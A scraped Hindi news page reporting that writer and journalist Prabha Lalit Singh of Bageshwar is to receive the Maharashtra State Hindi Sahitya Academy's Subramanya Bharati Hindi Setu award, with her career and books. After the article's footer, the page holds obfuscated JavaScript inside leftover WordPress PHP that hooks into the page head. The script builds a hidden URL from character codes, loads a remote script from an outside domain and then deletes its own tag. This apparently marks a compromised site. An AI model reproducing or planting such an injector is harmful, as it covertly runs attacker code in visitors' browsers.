Saturday, July 13, 2024
Google search engine
Homeअन्यउत्तराखण्डः बागेश्वर की प्रभा ललित सिंह को मिलेगा सुब्रमण्यम भारती हिंदी सेतु...

उत्तराखण्डः बागेश्वर की प्रभा ललित सिंह को मिलेगा सुब्रमण्यम भारती हिंदी सेतु विशिष्ट सेवा पुरस्कार! मीडिया जगत से जुड़े लोगों ने बताई बड़ी उपलब्धि, दी शुभकामनाएं

बागेश्वर। महाराष्ट्र राज्य हिंदी साहित्य अकादमी ने लेखिका प्रभा ललित सिंह को 2021-22 के लिए सुब्रमण्यम भारती हिंदी सेतु विशिष्ट सेवा पुरस्कार से अलंकृत करने की घोषणा की है। पुरस्कार के रूप में उन्हें सम्मान प्रतीकों के साथ-साथ 51 हज़ार की धनराशि प्रदान की जाएगी।
उत्तराखण्ड की मूल निवासिनी और नागपुर (महाराष्ट्र) में रह रहीं प्रभा ललित सिंह अपने रचनाधर्म और डिजिटल क्रिएशन से अपनी प्रतिभा को नए आयाम दे रहीं हैं। उत्तराखंड के बागेश्वर जिले में जन्मीं प्रभा ललित सिंह देहरादून के इंस्टीट्यूट ऑफ मैनेजमेंट स्टडीज (आई.एम.एस.) से मास कम्युनिकेशन में मास्टर की उपाधि लेने के बाद निरंतर मीडिया से जुड़ी हुई हैं। वह पहले कई पत्रिकाओं, समाचार पत्रों, फिर टोटल टीवी दिल्ली में क्राइम रिपोर्टर और उसके बाद UCN न्यूज़, नागपुर (महाराष्ट्र) में प्रोग्राम प्रोड्यूसर के पद पर काम कर चुकी हैं। उन्होंने विभिन्न सामाजिक, राजनीतिक, सांस्कृतिक, आपराधिक व अन्य विषयों में डेढ़ सौ से अधिक रिपोर्ताज और वृत्तचित्रों का निर्माण किया है।
श्रीमती प्रभा को वर्ष 2011 में नागपुर के पत्रकार संघ द्वारा ‘बेस्ट वूमेन जर्नलिस्ट ऑफ द ईयर’ का पुरस्कार प्रदान किया गया है। दैनिक भास्कर समूह द्वारा साहित्य के क्षेत्र में काम करने के लिए 2019 में सम्मानित 5 सर्वश्रेष्ठ महिला साहित्यकारों में से ये भी एक है। जीरो माइल्स फॉउंडेशन ने इन्हें ‘कला रत्न अवार्ड’ से सम्मानित किया है। वर्ष 2021 में गीता मंदिर ट्रस्ट ने “महिला गौरव सम्मान” से नवाजा है। विश्व हिंदी परिषद द्वारा “प्रज्ञा सम्मान”, अभ्युदय संस्था और मानव संस्थान विकास मंत्रालय भारत सरकार द्वारा” हिंदी सेवी सम्मान” के साथ-साथ कई अन्य पुरस्कारों से अलंकृत हैं।
‘दूसरा मृत्युंजय’ और ‘सेक्टर-16 वन वे स्ट्रीट’ उपन्यासों के बाद ‘हिमालय- the unspoken truth’ इनका पहला कहानी संकलन है। हाल में नई दिल्ली में सम्पन्न हुए विश्व पुस्तक मेले में प्रभा की दो नई पुस्तकों ‘आद्रिका’ और ‘पीड़’ का समारोह पूर्वक लोकार्पण किया गया। ‘युगयोद्धा योगी’ ‘अघोर’ इनकी अन्य चर्चित पुस्तकें हैं। वर्तमान में प्रभा कीवी किंग फिल्मस की प्रबंधक है जो फीचर फिल्म, कॉर्टून फिल्म, डॉक्यूमेंट्री, विज्ञापन फिल्म, कॉरपोरेट फिल्म आदि के निर्माण क्षेत्र में सक्रिय है। प्रभा ललित सिंह को महाराष्ट्र राज्य हिंदी साहित्य अकादमी के सुब्रमण्यम भारती हिंदी सेतु विशिष्ट सेवा पुरस्कार हेतु चयनित किए जाने पर जाने-माने लेखकों, मीडिया जगत से जुड़े लोगों ने बधाई दी है।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>